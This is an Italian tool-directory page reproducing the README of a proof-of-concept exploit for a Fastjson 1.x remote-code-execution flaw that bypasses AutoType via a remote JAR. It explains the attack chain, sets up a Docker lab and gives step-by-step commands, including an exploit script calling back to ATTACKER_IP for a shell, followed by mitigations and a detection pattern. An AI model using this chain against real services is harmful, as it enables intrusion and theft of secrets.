Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-16723 — PoC exploit per Fastjson RCE (CVE-2026-16723) con generazione e consegna automatica del payload JAR tramite JSON appositamente realizzato, bypassando le restrizioni di AutoType. | Kitploit
Strumenti/GitHubGitHub/eqstlab/cve-2026-16723
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneRed TeamingSviluppo Payload
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

PoC exploit per Fastjson RCE (CVE-2026-16723) con generazione e consegna automatica del payload JAR tramite JSON appositamente realizzato, bypassando le restrizioni di AutoType.

Vedi Repository
161 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Panoramica

CVE-2026-16723 è una vulnerabilità di esecuzione remota di codice (RCE) in Fastjson 1.x (1.2.68 – 1.2.83). Quando Fastjson analizza JSON controllato dall'attaccante, un valore @type appositamente costruito viene trasformato in una ricerca di risorsa di classe all'interno di checkAutoType. In un fat-JAR eseguibile Spring Boot, il class loader risolve quel nome come URL jar:http:// e recupera un JAR remoto (SSRF), quindi carica una classe che porta l'annotazione @JSONType anche se AutoType è disabilitato. Poiché un JDK / Tomcat moderno rifiuta il nome binario jar:http://, la variante affidabile inserisce il JAR nella cache JVM e lo rilegge tramite jar:file:/proc/self/fd/N, così la classe viene definita e il suo inizializzatore statico viene eseguito, ottenendo l'esecuzione di codice. AutoType rimane disabilitato e non è richiesto alcun gadget di classpath.


Versioni Affette

CategoriaVersione
VulnerabileFastjson 1.2.68 ≤ versione ≤ 1.2.83
CorrettoMigrare a Fastjson 2.x (nessuna versione 1.x corretta)

Impatto

  • Esecuzione remota di codice con l'account del servizio
  • Divulgazione di segreti / credenziali dall'host e dall'ambiente
  • Compromissione totale dell'applicazione interessata

Ambiente

Il target del laboratorio è un negozio online pubblico (Northwind Store) la cui API di ricerca deserializza il corpo della richiesta con Fastjson. Tutto è ai valori predefiniti standard di Fastjson: SafeMode disattivato, AutoType disattivato, impacchettato come fat-JAR Spring Boot.

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
PrerequisitoStato in questo laboratorio
Fastjson 1.2.68 – 1.2.831.2.83
fat-JAR eseguibile Spring Bootsì
Percorso di parsing JSON non autenticatoPOST /api/products/search
SafeMode / AutoTypepredefiniti (entrambi disattivati)

PoC

L'attaccante e il target si trovano sulla stessa rete bridge Docker, quindi il target raggiunge l'attaccante come connessione in uscita (nessuna porta aggiuntiva viene pubblicata).

Passo 1. Conferma che il target sia attivo

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Passo 2. Esegui l'exploit sulla macchina dell'attaccante

exploit.py crea il JAR del payload, lo serve, avvia un listener e stampa il corpo della richiesta. È richiesto solo l'indirizzo di callback.

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Passo 3. Consegna il payload

Incolla il corpo stampato nell'endpoint di ricerca (Burp Repeater o curl) e invialo. La richiesta di ricerca è una funzionalità normale; solo il suo corpo JSON è costruito ad hoc.

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Passo 4. Conferma il risultato

Il codice viene eseguito con l'account del servizio. Recupera la flag tramite la shell ottenuta:

root@kitploit:~
whoami

Mitigazione

  • Migrare a Fastjson 2.x
  • Oppure eseguire com.alibaba:fastjson:1.2.83_noneautotype
  • Oppure avviare la JVM con -Dfastjson.parser.safeMode=true
  • Rilevamento: valori JSON @type contenenti pattern jar:http o jar:file / /proc/self/fd

Analisi

  • KR:
  • EN:
Scarica lo strumento